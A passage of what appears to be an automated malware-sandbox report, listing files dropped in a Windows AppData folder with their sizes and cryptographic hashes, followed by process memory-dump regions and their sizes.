            5db758672cd47ea3cbf1b77d729c6e0c2a1df00294aad9269ca99186291192e0

            SHA512

            11220072eaceec38575d3d6aca358009a3e3d34c71ded988bde0232e12896e322c2af25b09b029fa02caf4ab318f6e818468de3bec4315fc4d4686c319c311d8

          • C:\Users\Admin\AppData\Roaming\-Q8-CS12\-Q8logrf.ini

            Filesize

            40B

            MD5

            2f245469795b865bdd1b956c23d7893d

            SHA1

            6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

            SHA256

            1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

            SHA512

            909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

          • C:\Users\Admin\AppData\Roaming\-Q8-CS12\-Q8logrg.ini

            Filesize

            38B

            MD5

            4aadf49fed30e4c9b3fe4a3dd6445ebe

            SHA1

            1e332822167c6f351b99615eada2c30a538ff037

            SHA256

            75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56

            SHA512

            eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945

          • C:\Users\Admin\AppData\Roaming\-Q8-CS12\-Q8logri.ini

            Filesize

            40B

            MD5

            d63a82e5d81e02e399090af26db0b9cb

            SHA1

            91d0014c8f54743bba141fd60c9d963f869d76c9

            SHA256

            eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

            SHA512

            38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

          • C:\Users\Admin\AppData\Roaming\-Q8-CS12\-Q8logrv.ini

            Filesize

            872B

            MD5

            bbc41c78bae6c71e63cb544a6a284d94

            SHA1

            33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a

            SHA256

            ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb

            SHA512

            0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

          • C:\Users\Admin\AppData\Roaming\Lovfstelser.Sla

            Filesize

            421KB

            MD5

            e0f84710814497b1b699e831af6dada3

            SHA1

            bf80c2eaca84ce45a713866d7c08b08f2ca3d264

            SHA256

            8e349e894e076fe8d193390b52be4691f8a425dd56d3b8a713c8dc30919ce0f9

            SHA512

            c713bc73447c880692edd796c71be09ca764836eabfde69c134fa3d16f0bdb254af58587b00d09f141f8a415ae658f1dd6845279ee27e71ff72de55234950a50

          • memory/1520-334-0x000001CA692B0000-0x000001CA692D2000-memory.dmp

            Filesize

            136KB

          • memory/1520-323-0x00007FFE899C3000-0x00007FFE899C5000-memory.dmp

            Filesize

            8KB

          • memory/1520-333-0x00007FFE899C0000-0x00007FFE8A481000-memory.dmp

            Filesize

            10.8MB

          • memory/1520-364-0x00007FFE899C0000-0x00007FFE8A481000-memory.dmp

            Filesize

            10.8MB

          • memory/1520-365-0x00007FFE899C3000-0x00007FFE899C5000-memory.dmp

            Filesize

            8KB

          • memory/1520-361-0x000001CA698F0000-0x000001CA69B0C000-memory.dmp

            Filesize

            2.1MB

          • memory/1520-335-0x00007FFE899C0000-0x00007FFE8A481000-memory.dmp

            Filesize

            10.8MB

          • memory/1520-382-0x00007FFE899C0000-0x00007FFE8A481000-memory.dmp

            Filesize

            10.8MB

          • memory/1556-384-0x00000000009C0000-0x0000000000AFA000-memory.dmp

            Filesize

            1.2MB

          • memory/1556-386-0x00000000009C0000-0x0000000000AFA000-memory.dmp

            Filesize

            1.2MB

          • memory/1556-387-0x0000000000850000-0x000000000087F000-memory.dmp

            Filesize

            188KB

          • memory/3436-407-0x0000000002F40000-0x0000000002FDE000-memory.dmp

            Filesize

            632KB

          • memory/3956-383-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/3956-379-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/4120-339-0x0000000005B90000-0x00000000061B8000-memory.dmp

            Filesize

            6.2MB

          • memory/4120-362-0x00000000092C0000-0x000000000CE90000-memory.dmp

            Filesize

            59.8MB

          • memory/4120-359-0x0000000008D10000-0x00000000092B4000-memory.dmp

            Filesize

            5.6MB

          • memory/4120-358-0x0000000007AD0000-0x0000000007AF2000-memory.dmp

            Filesize

            136KB

          • memory/4120-357-0x0000000007B40000-0x0000000007BD6000-memory.dmp

            Filesize

            600KB

          • memory/4120-356-0x0000000006E30000-0x0000000006E4A000-memory.dmp

            Filesize

            104KB

          • memory/4120-355-0x00000000080E0000-0x000000000875A000-memory.dmp

            Filesize

            6.5MB

          • memory/4120-354-0x00000000068D0000-0x000000000691C000-memory.dmp

            Filesize

            304KB

          • memory/4120-353-0x00000000068A0000-0x00000000068BE000-memory.dmp

            Filesize

            120KB

          • memory/4120-352-0x0000000006310000-0x0000000006664000-memory.dmp

            Filesize

            3.3MB

          • memory/4120-342-0x00000000062A0000-0x0000000006306000-memory.dmp

            Filesize

            408KB

          • memory/4120-341-0x00000000061C0000-0x0000000006226000-memory.dmp

            Filesize

            408KB

          • memory/4120-340-0x0000000005A50000-0x0000000005A72000-memory.dmp

            Filesize

            136KB

          • memory/4120-338-0x0000000002F60000-0x0000000002F96000-memory.dmp

            Filesize

            216KB